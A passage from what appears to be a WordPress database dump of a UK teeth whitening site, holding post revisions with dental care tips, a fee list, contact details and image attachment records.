floss</h2>\n</li>\n</ol>\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\n\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\n\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\n<ol start=\"3\">\n <li>\n<h2>Visit the dentist often</h2>\n</li>\n</ol>\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\n<ol start=\"4\">\n <li>\n<h2>Rinse your mouth with water</h2>\n</li>\n</ol>\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\n<ol start=\"5\">\n <li>\n<h2>Consider teeth whitening</h2>\n</li>\n</ol>\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\n\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\n\nMany prefer to have this done by professionals who are careful and trustworthy.\n\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system which is a dental clinic who provide fantastic teeth whitening results and exceptional dentistry.\n\n \n\n \n\n ','Welcome to a whiter smile','','inherit','closed','closed','','20-autosave-v1','','','2018-11-06 12:24:21','2018-11-06 12:24:21','',20,'https://teethwhiteningproduct.co.uk/2018/01/26/20-autosave-v1/',0,'revision','',0),(33,1,'2018-01-26 12:25:46','2018-01-26 12:25:46','','baby-hand','','inherit','open','closed','','baby-hand','','','2018-01-26 12:25:46','2018-01-26 12:25:46','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/baby-hand.jpg',0,'attachment','image/jpeg',0),(34,1,'2018-01-26 12:25:46','2018-01-26 12:25:46','','back massage','','inherit','open','closed','','back-massage','','','2018-01-26 12:25:46','2018-01-26 12:25:46','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/back-massage.jpg',0,'attachment','image/jpeg',0),(35,1,'2018-01-26 12:25:47','2018-01-26 12:25:47','','black-white-pregnant','','inherit','open','closed','','black-white-pregnant','','','2018-01-26 12:25:47','2018-01-26 12:25:47','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/black-white-pregnant.jpg',0,'attachment','image/jpeg',0),(36,1,'2018-01-26 12:25:48','2018-01-26 12:25:48','','blood pressure machine','','inherit','open','closed','','blood-pressure-machine','','','2018-01-26 12:25:48','2018-01-26 12:25:48','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/blood-pressure-machine.jpg',0,'attachment','image/jpeg',0),(37,1,'2018-01-26 12:25:48','2018-01-26 12:25:48','','cigarette-smoke-embers-ash-70088','','inherit','open','closed','','cigarette-smoke-embers-ash-70088','','','2018-01-26 12:25:48','2018-01-26 12:25:48','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/cigarette-smoke-embers-ash-70088.jpeg',0,'attachment','image/jpeg',0),(38,1,'2018-01-26 12:25:49','2018-01-26 12:25:49','','cosmetics','','inherit','open','closed','','cosmetics','','','2018-01-26 12:25:49','2018-01-26 12:25:49','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/cosmetics.jpg',0,'attachment','image/jpeg',0),(39,1,'2018-01-26 12:25:49','2018-01-26 12:25:49','','counselling','','inherit','open','closed','','counselling','','','2018-01-26 12:25:49','2018-01-26 12:25:49','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/counselling.jpg',0,'attachment','image/jpeg',0),(40,1,'2018-01-26 12:25:50','2018-01-26 12:25:50','','crooked before and after','','inherit','open','closed','','crooked-before-and-after','','','2018-01-26 12:25:50','2018-01-26 12:25:50','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/crooked-before-and-after.png',0,'attachment','image/png',0),(41,1,'2018-01-26 12:25:50','2018-01-26 12:25:50','','dentist','','inherit','open','closed','','dentist','','','2018-01-26 12:25:50','2018-01-26 12:25:50','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist.jpg',0,'attachment','image/jpeg',0),(42,1,'2018-01-26 12:25:51','2018-01-26 12:25:51','','dentist-chair','','inherit','open','closed','','dentist-chair','','','2018-01-26 12:25:51','2018-01-26 12:25:51','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg',0,'attachment','image/jpeg',0),(43,1,'2018-01-26 12:25:52','2018-01-26 12:25:52','','disabled','','inherit','open','closed','','disabled','','','2018-01-26 12:25:52','2018-01-26 12:25:52','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/disabled.jpg',0,'attachment','image/jpeg',0),(44,1,'2018-01-26 12:25:53','2018-01-26 12:25:53','','discoloured','','inherit','open','closed','','discoloured','','','2021-05-28 10:27:20','2021-05-28 10:27:20','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/discoloured.png',0,'attachment','image/png',0),(45,1,'2018-01-26 12:25:53','2018-01-26 12:25:53','','divorce2','','inherit','open','closed','','divorce2','','','2018-01-26 12:25:53','2018-01-26 12:25:53','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/divorce2.jpg',0,'attachment','image/jpeg',0),(46,1,'2018-01-26 12:25:54','2018-01-26 12:25:54','','doctor jackrt','','inherit','open','closed','','doctor-jackrt','','','2018-01-26 12:25:54','2018-01-26 12:25:54','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/doctor-jackrt.jpg',0,'attachment','image/jpeg',0),(47,1,'2018-01-26 12:25:54','2018-01-26 12:25:54','','doctor','','inherit','open','closed','','doctor','','','2018-01-26 12:25:54','2018-01-26 12:25:54','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/doctor.jpg',0,'attachment','image/jpeg',0),(48,1,'2018-01-26 12:25:55','2018-01-26 12:25:55','','doctors tools black and white','','inherit','open','closed','','doctors-tools-black-and-white','','','2018-01-26 12:25:55','2018-01-26 12:25:55','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/doctors-tools-black-and-white.jpg',0,'attachment','image/jpeg',0),(49,1,'2018-01-26 12:25:56','2018-01-26 12:25:56','','domestic building','','inherit','open','closed','','domestic-building','','','2018-01-26 12:25:56','2018-01-26 12:25:56','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/domestic-building.jpg',0,'attachment','image/jpeg',0),(50,1,'2018-01-26 12:26:05','2018-01-26 12:26:05','From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-01-26 12:26:05','2018-01-26 12:26:05','',20,'https://teethwhiteningproduct.co.uk/2018/01/26/20-revision-v1/',0,'revision','',0),(51,1,'2018-01-26 12:26:05','2018-01-26 12:26:05','','exercise','','inherit','open','closed','','exercise','','','2018-01-26 12:26:05','2018-01-26 12:26:05','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/exercise.jpg',0,'attachment','image/jpeg',0),(52,1,'2018-01-26 12:26:07','2018-01-26 12:26:07','','fitness-class','','inherit','open','closed','','fitness-class','','','2018-01-26 12:26:07','2018-01-26 12:26:07','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/fitness-class.jpg',0,'attachment','image/jpeg',0),(53,1,'2018-01-26 12:26:33','2018-01-26 12:26:33','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-01-26 12:26:33','2018-01-26 12:26:33','',20,'https://teethwhiteningproduct.co.uk/2018/01/26/20-revision-v1/',0,'revision','',0),(63,1,'2018-01-30 07:59:50','2018-01-30 07:59:50','Here at teeth whitening products we combine over 25 years of professional experience together with the latest technology and treatment methods to provide you with the very best care in modern, comfortable surroundings.','About Us','','inherit','closed','closed','','15-revision-v1','','','2018-01-30 07:59:50','2018-01-30 07:59:50','',15,'https://teethwhiteningproduct.co.uk/2018/01/30/15-revision-v1/',0,'revision','',0),(64,1,'2018-01-30 08:00:06','2018-01-30 08:00:06','Here at teeth whitening products we combine over 25 years of professional experience together with the latest technology and treatment methods to provide you with the very best care in modern, comfortable surroundings.\r\n\r\nWe work in a relaxed but professional manner, doing our utmost to deliver an excellent service to our patients and to relieve any worries about visiting the dentist.','About Us','','inherit','closed','closed','','15-revision-v1','','','2018-01-30 08:00:06','2018-01-30 08:00:06','',15,'https://teethwhiteningproduct.co.uk/2018/01/30/15-revision-v1/',0,'revision','',0),(65,1,'2018-01-30 08:00:51','2018-01-30 08:00:51','The dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"><img src=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/mysimplydental.co.uk_bensykes_bensykes.co.uk_oc7piwzouhr_backup/userimages/teeth430x300.jpg\" alt=\"\" width=\"430\" height=\"300\" border=\"0\" /></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>','Dentists','','inherit','closed','closed','','13-revision-v1','','','2018-01-30 08:00:51','2018-01-30 08:00:51','',13,'https://teethwhiteningproduct.co.uk/2018/01/30/13-revision-v1/',0,'revision','',0),(66,1,'2018-01-30 08:01:10','2018-01-30 08:01:10','The dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket.\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n\r\nWe follow strict hygiene and infection control procedures to ensure the safety of our patients.','Dentists','','inherit','closed','closed','','13-revision-v1','','','2018-01-30 08:01:10','2018-01-30 08:01:10','',13,'https://teethwhiteningproduct.co.uk/2018/01/30/13-revision-v1/',0,'revision','',0),(67,1,'2018-01-30 08:01:59','2018-01-30 08:01:59','Every patient is different and hence each patient\'s fees will reflect their individual needs and sometimes the price depends on which material is used. You will be given a personal estimate for any treatment required after your examination, and always given a choice when different treatments are available at different costs. Below are some examples of our fees :\r\n<div align=\"justify\">\r\n<ul>\r\n <li>Initial consultation (new patient)......................................£40</li>\r\n <li>Regular examination........................................................£30</li>\r\n <li>Simple scale and polish..................................................£35</li>\r\n <li>White filling.......................................................from.........£65</li>\r\n <li>Simple extraction.............................................from.........£65</li>\r\n <li>Crown................................................................from.......£350</li>\r\n <li>Teeth whitening................................................from.......£300</li>\r\n <li>Partial denture..................................................from.......£260</li>\r\n</ul>\r\n</div>','Shop','','inherit','closed','closed','','11-revision-v1','','','2018-01-30 08:01:59','2018-01-30 08:01:59','',11,'https://teethwhiteningproduct.co.uk/2018/01/30/11-revision-v1/',0,'revision','',0),(68,1,'2018-01-30 08:03:38','2018-01-30 08:03:38','<h1>We are extremely proud of the pioneering clinic we have built.</h1>\r\n<div class=\"site-aligner\">\r\n<div class=\"widget-column\">\r\n<div class=\"cols\">\r\n<h2>Teeth whitening studios</h2>\r\n1-7 Harley St, Marylebone, London W1G 9QD\r\n<div class=\"foot-label\">Tel :</div>\r\n<div class=\"phone-content\">020 7112 1112</div>\r\n<div class=\"clear\"></div>\r\n<div class=\"foot-label\">E-mail :</div>\r\n<div class=\"mail-content\"><a href=\"mailto:sales@teethwhiteningproduct.co.uk\">sales@teethwhiteningproduct.co.uk</a></div>\r\n</div>\r\n</div>\r\n</div>','Contact Us','','inherit','closed','closed','','17-revision-v1','','','2018-01-30 08:03:38','2018-01-30 08:03:38','',17,'https://teethwhiteningproduct.co.uk/2018/01/30/17-revision-v1/',0,'revision','',0),(72,1,'2018-01-30 08:06:17','2018-01-30 08:06:17','','Prices','','publish','closed','closed','','prices','','','2018-01-30 08:06:17','2018-01-30 08:06:17','',0,'https://teethwhiteningproduct.co.uk/?page_id=72',0,'page','',0),(73,1,'2018-01-30 08:06:15','2018-01-30 08:06:15','','Prices','','inherit','closed','closed','','72-revision-v1','','','2018-01-30 08:06:15','2018-01-30 08:06:15','',72,'https://teethwhiteningproduct.co.uk/2018/01/30/72-revision-v1/',0,'revision','',0),(74,1,'2018-01-30 08:09:49','2018-01-30 08:09:49','','from-55-41','','inherit','open','closed','','from-55-41','','','2018-01-30 08:09:49','2018-01-30 08:09:49','',0,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/from-55-41.gif',0,'attachment','image/gif',0),(77,1,'2018-01-30 08:12:44','2018-01-30 08:12:44','<h3>We are not members of the GDC</h3>\r\nThe General Dental Council (GDC) is the regulatory body of the dental profession in the United Kingdom. Their address is 37 Wimpole Street, London, W1G 8DQ and their telephone number is <a href=\"tel:020%207887%203800\" target=\"_blank\" rel=\"noopener\">020 7887 3800</a>. Our dentists and staff adhere to the regulations governing the profession by the GDC as set out in their publication Standards for Dental Professionals. You can find out more about the GDC on their website <a href=\"http://www.gdc-uk.org/\" target=\"_blank\" rel=\"noopener\">www.gdc-uk.org</a>.','Professional Registration','','publish','open','open','','professional-registration','','','2018-11-06 12:42:52','2018-11-06 12:42:52','',0,'https://teethwhiteningproduct.co.uk/?p=77',0,'post','',0),(78,1,'2018-01-30 08:12:42','2018-01-30 08:12:42','','coffee and ipad','','inherit','open','closed','','coffee-and-ipad','','','2018-01-30 08:12:42','2018-01-30 08:12:42','',77,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/coffee-and-ipad.jpg',0,'attachment','image/jpeg',0),(79,1,'2018-01-30 08:12:44','2018-01-30 08:12:44','<h3>We are not members of the GDC</h3>\r\nThe General Dental Council (GDC) is the regulatory body of the dental profession in the United Kingdom. Their address is 37 Wimpole Street, London, W1G 8DQ and their telephone number is <a href=\"tel:020%207887%203800\" target=\"_blank\" rel=\"noopener\">020 7887 3800</a>. Our dentists and staff adhere to the regulations governing the profession by the GDC as set out in their publication Standards for Dental Professionals. You can find out more about the GDC on their website <a href=\"http://www.gdc-uk.org/\" target=\"_blank\" rel=\"noopener\">www.gdc-uk.org</a>.','Professional Registration','','inherit','closed','closed','','77-revision-v1','','','2018-01-30 08:12:44','2018-01-30 08:12:44','',77,'https://teethwhiteningproduct.co.uk/2018/01/30/77-revision-v1/',0,'revision','',0),(80,1,'2018-01-30 08:13:33','2018-01-30 08:13:33','','dentist - Copy','','inherit','open','closed','','dentist-copy','','','2018-01-30 08:13:33','2018-01-30 08:13:33','',15,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-Copy.jpg',0,'attachment','image/jpeg',0),(81,1,'2018-01-30 08:13:33','2018-01-30 08:13:33','','dentist-chair - Copy','','inherit','open','closed','','dentist-chair-copy','','','2018-01-30 08:13:33','2018-01-30 08:13:33','',15,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair-Copy.jpg',0,'attachment','image/jpeg',0),(82,1,'2018-01-30 08:13:34','2018-01-30 08:13:34','','medic - Copy','','inherit','open','closed','','medic-copy','','','2018-01-30 08:13:34','2018-01-30 08:13:34','',15,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/medic-Copy.jpg',0,'attachment','image/jpeg',0),(83,1,'2018-01-30 08:13:35','2018-01-30 08:13:35','','morning-sickness - Copy','','inherit','open','closed','','morning-sickness-copy','','','2018-01-30 08:13:35','2018-01-30 08:13:35','',15,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/morning-sickness-Copy.jpg',0,'attachment','image/jpeg',0),(84,1,'2018-01-30 08:13:35','2018-01-30 08:13:35','','optician - Copy','','inherit','open','closed','','optician-copy','','','2018-01-30 08:13:35','2018-01-30 08:13:35','',15,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/optician-Copy.jpg',0,'attachment','image/jpeg',0),(85,1,'2018-01-30 08:13:36','2018-01-30 08:13:36','','teeth-check - Copy','','inherit','open','closed','','teeth-check-copy','','','2018-01-30 08:13:36','2018-01-30 08:13:36','',15,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg',0,'attachment','image/jpeg',0),(86,1,'2018-01-30 08:14:05','2018-01-30 08:14:05','<img class=\"aligncenter wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"\" width=\"872\" height=\"466\" />Here at teeth whitening products we combine over 25 years of professional experience together with the latest technology and treatment methods to provide you with the very best care in modern, comfortable surroundings.\r\n\r\nWe work in a relaxed but professional manner, doing our utmost to deliver an excellent service to our patients and to relieve any worries about visiting the dentist.','About Us','','inherit','closed','closed','','15-revision-v1','','','2018-01-30 08:14:05','2018-01-30 08:14:05','',15,'https://teethwhiteningproduct.co.uk/2018/01/30/15-revision-v1/',0,'revision','',0),(87,1,'2018-01-30 08:14:45','2018-01-30 08:14:45','','Home','','publish','closed','closed','','home','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=87',1,'nav_menu_item','',0),(88,1,'2018-01-30 08:14:45','2018-01-30 08:14:45',' ','','','publish','closed','closed','','88','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=88',2,'nav_menu_item','',0),(89,1,'2018-01-30 08:14:45','2018-01-30 08:14:45',' ','','','publish','closed','closed','','89','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=89',16,'nav_menu_item','',0),(90,1,'2018-01-30 08:14:45','2018-01-30 08:14:45','','For Dentists','','publish','closed','closed','','for-dentists','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=90',3,'nav_menu_item','',0),(91,1,'2018-01-30 08:14:45','2018-01-30 08:14:45',' ','','','publish','closed','closed','','91','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=91',12,'nav_menu_item','',0),(92,1,'2018-01-30 08:14:45','2018-01-30 08:14:45',' ','','','publish','closed','closed','','92','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=92',15,'nav_menu_item','',0),(93,1,'2018-01-30 08:14:45','2018-01-30 08:14:45',' ','','','publish','closed','closed','','93','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=93',13,'nav_menu_item','',0),(94,1,'2018-01-30 08:14:45','2018-01-30 08:14:45',' ','','','publish','closed','closed','','94','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=94',14,'nav_menu_item','',0),(95,1,'2018-01-30 08:14:45','2018-01-30 08:14:45','','Teeth Whitening','','publish','closed','closed','','95','','','2021-05-28 10:31:57','2021-05-28 10:31:57','',0,'https://teethwhiteningproduct.co.uk/?p=95',10,'nav_menu_item','',0),(98,1,'2018-11-01 08:24:58','2018-11-01 08:24:58','<h2>Healthy Smile</h2>\r\nA healthy mouth is important to us, as we all need it to speak, drink, eat, smile and kiss! We all aim to achieve that healthy, appealing smile but many of us are not quite sure how to achieve it. If you look after you teeth and gums, you will be looking after a very important part of your body that helps you look great and feel confident. Here are a few guidelines that we hope you will find useful in creating that healthy, confident smile:\r\n\r\nWe all need to visit our dentist and hygienist regularly to maintain that healthy smile. By visiting MC Dental Practice regularly, your dentist will be able to spot any problems that you may have and any that you may be unaware of that can be detected on radiographs. Your hygienist will be able to help you maintain healthy gums and advise you on ways to improve your cleaning at home.\r\n\r\nIt could be very helpful to research many possible ways in which you could whiten your quickly and effectively\r\n\r\n<a href=\"https://medlanddental.com.au/teeth-whitening/\" target=\"_blank\" rel=\"noopener\">Expert Teeth Whitening Services</a> such as The Zoom WhiteSpeed system is one of the quickest and most convenient way to immediately achieve fantastic teeth whitening result.\r\n\r\n<img class=\"alignleft wp-image-181 \" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/11/teeth-1652937_960_720.jpg\" alt=\"\" width=\"649\" height=\"471\" />\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n<strong>► Cosmetic dentistry</strong>\r\n<a href=\"http://welovewhiteteeth.co.uk/procedure/teeth-whitening-aftercare\" target=\"_blank\" rel=\"noopener\"><strong> ► Teeth Whitening</strong></a>\r\n<strong> ► Orthodontic</strong>\r\n<a href=\"http://themewsdentalstudio.co.uk/cosmetic-dentistry/benefits-dental-implants\" target=\"_blank\" rel=\"noopener\"><strong> ► Dental Implants</strong></a>\r\n<strong> ► Crown and Bridges</strong>\r\n<strong> ► Prosthetic</strong>\r\n<strong> ► Periodontics</strong>\r\n<strong> ► Endodontics</strong>','Keeping a Healthy Smile','','publish','open','open','','keeping-a-healthy-smile','','','2018-11-06 13:24:29','2018-11-06 13:24:29','',0,'https://teethwhiteningproduct.co.uk/?p=98',0,'post','',0),(99,1,'2019-02-18 16:17:52','2019-02-18 16:17:52',' \n<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\n\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\n\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\n\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\n\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\n\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\n<ul>\n <li>Restorative (crown and bridges)</li>\n <li>Cosmetic (including veneers & tooth whitening)</li>\n <li>Preventative (orthodontic)</li>\n</ul>\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\n\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\n\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Teeth Whitening','','inherit','closed','closed','','5-autosave-v1','','','2019-02-18 16:17:52','2019-02-18 16:17:52','',5,'https://teethwhiteningproduct.co.uk/2018/01/30/5-autosave-v1/',0,'revision','',0),(100,1,'2018-01-30 08:24:58','2018-01-30 08:24:58','A healthy mouth is important to us, as we all need it to speak, drink, eat, smile and 